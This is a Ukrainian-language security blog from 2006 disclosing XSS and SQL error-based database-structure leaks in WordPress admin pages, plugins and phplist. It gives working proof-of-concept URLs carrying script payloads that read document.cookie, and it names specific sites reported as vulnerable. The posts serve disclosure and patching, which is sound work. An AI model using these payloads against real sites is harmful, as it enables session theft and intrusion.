Websecurity - Веб безпека

16.10.2006

До движка WordPress та плагінів під нього в мене особлива і підвищена увага - і я ругялярно провожу аудит безпеки WP (та його плагінів), тому що мій власний сайт базується на даному движку. І можу сказати, що WordPress, в якому нечасто знаходять уразливості (рідко ви про це прочитаєте в новинах секюріті сайтів), і саме за це я і вибрав даний движок, все ж таки має чимало уразливостей.

І чим більше я досліджую його, тим більше уразливостей знаходжу. Особливо уразливими є плагіни (які компроментують движок і сайт у цілому), зокрема плагіни сторонніх розробників, про що в новинах я писав неодноразово, але й в самому движку також є вразливості (і в тому ж плагіні WP-DB Backup, який входить до стандартної поставки движка WP).

До вже згаданих уразливостей в WordPress та його плагінах (Cross-Site Scripting в WP-PHPList, Уразливості в Subscribe To Comments WordPress plugin та Уразливість в Wordpress WP-DB Backup Plugin), я повідомляю про численні уразливості в самому Wordpress (а також в інших плагінах, з числа тих, якими я користуюся, і про що я окремо повідомлю).

Це зокрема Cross-Site Scripting уразливості в адмінці WP, які я зайшов в серпні (3 XSS) і вересні (2 XSS, а також одна SQL DB Structure Extraction). Це лише частина усіх знайдених мною уразливостей в Wordpress (вразливі версії до 2.0.3 включно, і може 2.0.4). Про ті уразливості (й їх чимало), що я знайшов в жовтні, а також про уразливсоті в інших плагінах для WP, я розповім окремо.

Найближчим часом я повідомлю деталі, але спочатку пофіскю ці всі уразливості на своєму сайті (тому за них не переживайте ), а також повідомлю розробникам WordPress і всім тим людям, яким я попередньо вже про ці уразливості розповів, включаючи розробників WP. Зараз залишилося написати їм всім деталі уразливостей (ну і підготую рекомендації по їх виправленню).

17.10.2006

Додам ще про нові уразливості в WordPress (і які мали місце на моєму сайті), про які я також найближчим чамосом повідомлю розробникам цього движка.

Вчора Андрій, який якраз завітав подякувати мені за інформацію про уразливості на його сайті, повідомив мені, що він знайшов дві уразливості в мене на сайті. Що звичайно мене зацікавило . Так от, після отримання детальної інформації від Андрія і перевірки, виявилось що на моєму сайті (в движку WP) є дві уразливості: SQL DB Structure Extraction (а не SQL Injection, як думав Андрій) та XSS - в пошуці по сайту.

Причому він використував дуже хитрий метод пошуку цих уразливостей. Який я планую додатково дослідити - це використання деяких специфічних символів, котрі при деяких випадках можуть привести до виведення помилки в SQL запиті - і відповідно до уразливостей SQL DB Structure Extraction та XSS.

Як я додатково перевірив різні скрипти, які входять до складу движка WordPress (в адмінці і в плагінах), ця уразливість також має місце окрім пошуку по сайту, ще в ряді скриптів. Додатково уразливість проявляється в 5 скриптах - в суммі 8 уразливостей. Враховуючи дві попередні уразливості в пошуку, загалом маємо 10 уразливостей (SQL DB Structure Extraction та XSS). Про них я повідомлю деталі піздніше, після повідомлення розробникам WP. Ці уразливості я вже виправив на сайті, тому за них не переживайте.

Дані уразливості не торкаються всіх сайтів на движку WordPress. Вони спрацьовують лише при деяких налаштуваннях БД (налаштуваннях кодування), які мають місце на моєму сайті, і можуть бути також на деяких інших сайтах. Тому це лише поодинокий випадок, який тим не менш має свої ризики, що при деяких налаштуваннях MySQL, може відбуватися помилка в запиті до БД, що приводить до уразливостей (XSS + SQL DB Structure Extraction).

Детальна інформація.

Знайдено 24.08.2006.

XSS:

http://site/wp-admin/templates.php?file=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Знайдено 29.08.2006.

XSS:

http://site/wp-admin/inline-uploading.php?action=upload&all=true&start=-%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/inline-uploading.php?action=upload&all=true%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Знайдено 01.09.2006.

XSS:

POST запит на сторінці http://site/wp-admin/link-import.php
<script>alert(document.cookie)<script>В полі: Вкажіть OPML URL.

Знайдено 16.09.2006.

XSS:

http://site/wp-admin/edit.php?m=&paged=2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Знайдено 27.09.2006.

SQL DB Structure Extraction:

http://site/wp-admin/edit.php?paged=-1

Знайдено 17.10.2006.

Дані уразливості працюють лише при специфічній конфігурації кодування на сайті (при специфічних налаштуваннях БД, в даному випадку MySQL). Коли на сайті наявне UTF-8 кодування, в БД встановлене інше кодування (наприклад, Windows-1251) і в коді движка задане примусове встановлення UTF-8 кодування.

SQL DB Structure Extraction:

http://site/?s=%A0
http://site/wp-admin/edit.php?s=%A0
http://site/wp-admin/edit-pages.php?s=%A0
http://site/wp-admin/edit-comments.php?s=%A0

XSS:

http://site/?s=%A0%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/edit.php?s=%A0%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/edit-pages.php?s=%A0%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/edit-comments.php?s=%A0%3Cscript%3Ealert(document.cookie)%3C/script%3E

SQL DB Structure Extraction:

http://site/wp-admin/edit.php?page=subscribe-to-comments.php&email=%A0
http://site/wp-subscription-manager.php?page=subscribe-to-comments.php&email=%A0

28.09.2006

В минулому місяці, 27.08.2006, я знайшов Cross-Site Scripting уразливість на популярному проекті http://www.getinfo.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

17.10.2006

XSS:

• alert(document.cookie)

Уразливість вже попередньо виправлена адміністрацією (вони взагалі відключили розділ “Розсилка” де була виявлена уразливість).

В даній добірці уразливості в веб додатках:

• eSyndiCat Directory Software “what” Cross-Site Scripting (деталі)
• Drupal Search Keywords Module Script Insertion (деталі)
• PT News “pgname” Cross-Site Scripting Vulnerability (деталі)
• NextAge Cart “CatId” and “SearchWd” Cross-Site Scripting (деталі)
• PowerNews v1.1.0 (nbs) Remote File Inclusion (деталі)
• PHPartenaire => $url_phpartenaire Remote File Inclusion Exploit (деталі)
• AllMyGuests => ?_AMGconfig[cfg_serverpath] Remote File Inclusion Exploit (деталі)
• SolidState <= 0.4 Multiple Include Vulnerabilities (деталі)
• Banex 2.21 PHP remote file inclusion vulnerability (деталі)
• N.T. Version 1.1.0 XSS and PHP Code Insertion Vulnerabilities (деталі)

26.09.2006

В минулому місяці, 26.08.2006 (як раз на свій день народження ), я знайшов декілька Cross-Site Scripting уразливостей на популярному проекті http://chin.org.ua - Чистий Інтернет. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

15.10.2006

XSS:

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• цікавий
• html включення

Уразливості досі не виправлені.

Вчора до мене звернулися з проханням протестувати сайт Верховної Ради України (ВРУ) на уразливості (сайт http://portal.rada.gov.ua та зокрема http://zakon.rada.gov.ua). І як показав мій попередній секюріті аудит, результати невтішні і сайт Верховної Ради уразливий. В даному випадку я знайшов декілька Cross-Site Scripting уразливостей. Про що попередньо вже повідомив адміністрацію веб сайту, і зараз підготую детальний звіт.

Я регулярно провожу аудит безпеки різноманітних сайтів, як своїх власних, так і сайтів своїх партнерів, і тих сайтів, які мені на очі потрапляють. Ну а також іноді провожу аудит веб сайтів, веб додатків та веб систем на замовлення. Але до цього часу державний сектор вебу (gov) не залучав мою увагу (окрім випадку з сайтом Агентства Національної Безпеки США Cross-Site Scripting уразливість на www.nsa.gov, але в даному випадку це секюріті сайт, і звернув увагу саме через тематику сайту). І ось я оглянув один наш gov сайт - веб сайт Верховної Ради. Найвищого законодавчого органу держави - і тому сайт повинен бути взірцем безпеки.

Але результати невтішні - на сайті мають місце уразливості (і це був лише попередній огляд). Можна представити загальний стан серед державних gov сайтів в Україні (як мінімум, а то і по всьому світі можна екстраполювати). І цю ситуацію потрібно змінювати. Сайту Верховної Ради та іншим сайтам державних органів потрібно приділяти увагу безпеці та секюріті-аудиту. Я зі своєї сторони надам необхідні консультації, головне щоб уразливості оперативно виправляли і слідкували за безпекою.

В даній добірці уразливості в веб додатках:

• Site@School 2.4.02 and below Multiple remote Command Execution Vulnerabilities (деталі)
• NextAge Cart Cross-Site Scripting multiple Vulnerabilities (деталі)
• PT News 1.7.8 (Search.php) XSS Vulnerability (деталі)
• Pie Cart Pro => (Home_Path) Remote File Inclusion Exploit (деталі)
• Innovate Portal v2.0 Index.PHP Xss Vuln. (деталі)
• OSU httpd for OpenVMS path and directory disclosure (деталі)
• DotNetNuke “error” Parameter Cross-Site Scripting Vulnerability (деталі)
• MAXdev MD-Pro Cross-Site Scripting Vulnerability (деталі)
• Banex 2.21 access validation error (деталі)
• Міжсайтовий скриптінг в Snitz Forums 2000 (деталі)

16.09.2006

В минулому місяці, 24.08.2006, я знайшов Cross-Site Scripting уразливість на відомому проекті http://inet.ua. Про що найближчим часом сповіщу адміністрацію проекту. Компанії Адамант потрібно приділяти увагу безпеці власних сайтів.

Детальна інформація про уразливості з’явиться пізніше.

12.10.2006

XSS:

• alert(document.cookie)

Як мені сьогодні повідомили адміністратори компанії Адамант уразливість вже виправлена.

05.10.2006

Вчора, 04.10.2006, я виявив Cross-Site Scripting уразливість в phplist - системі керування розсилками. XSS знайдена в phplist v 2.10.2 (і відовідно вразливі попередні версії - як я перевірив, в версіях до 2.10.2 уразливість працює).

До речі це остання версія phplist (як заявлено на офіційному сайті), тому всім користувачам цієї системи прийдеться бути обережними (і відвідувачам сайтів, де встановлена дана система). Та їм потрібно буде звернутися до розробників за апдейтом, а самим розробникам прийдетья терміново випускати нову версію.

Як я вже казав, дану уразливість в phplist я знайшов, коли заходив на сайт phpbb і виявив уразливість на www.phpbb.com.

Як я провів відповідні досліження, існує чимало уразливих сайтів з цією системою. Зокрема по одному запиту Гугл виводить приблизно 320000 сайтів. Тому в інтернеті зараз є вилика кількість сайтів, яким прийдеться зайнятися власною безпекою (раз раніше цим не зайнялися). На що взагалі потрібен звертати увагу кожен власник сайта.

Серед вразливих сайтів:

http://www.phplist.com
http://www.sed.gr
http://www.chrisvaughn.net
http://www.aliquotconsulting.com
http://www.tomalogy.com.ua
http://www.znayu.org.ua
http://helicon.com.ua
http://lists.longform.ca
http://www.localenergy.org
http://britannicadreams.com

Сайт розробників системи - www.phplist.com - також вразливий, що і не дивно, бо вони на своєму сайті використовують власну ж систему.

Деталі уразливості з’являться трохи згодом, спочатку повідомлю розробників системи та перший десяток власників уразливих сайтів.

11.10.2006

Уразливість в параметрі unsubscribeemail в скрипті index.php системи phplist.

XSS:

http://host/phplist_path/?p=unsubscribe&id=1&unsubscribeemail=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Автор phplist вже випустив нову версію системи (phplist 2.10.3). Всім користувачам даної системи потрібно терміново оновити її до останньої версії, хто ще цього не зробив. Як я вже казав, в інтернеті приблизно 319000-320000 сайтів, які використовують дану систему (по інформації від Гугл), тому їм всім потрібно підвищити безпеку власних сайтів.

В даній добірці уразливості в веб додатках:

• Pie Cart Pro => (Inc_Dir) Remote File Inclusion Exploit (деталі)
• Pie Cart Pro => (Home_Path) Remote File Inclusion Exploit (деталі)
• Bcwb 0.99(root_path)Remote File Include Vulnerability (деталі)
• Gnuturk Portal “t_id” Parameter SQL Injection Vulnerability (деталі)
• aeDating “dir[inc]” File Inclusion Vulnerabilities (деталі)
• A.I-Pifou (Cookie) Local File Inclusion (деталі)
• DotNetNuke HTML Code Injection (деталі)
• Neon WebMail for Java Multiple Vulnerabilities (деталі)
• Міжсайтовий скриптінг в GeoClassifieds Enterprise (деталі)
• MWGuest XSS Vulnerability (деталі)

24.09.2006

В минулому місяці, 25.08.2006, я знайшов Cross-Site Scripting уразливість на популярному проекті http://news2.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

10.10.2006

XSS:

• alert(document.cookie)

Уразливість вже виправлена.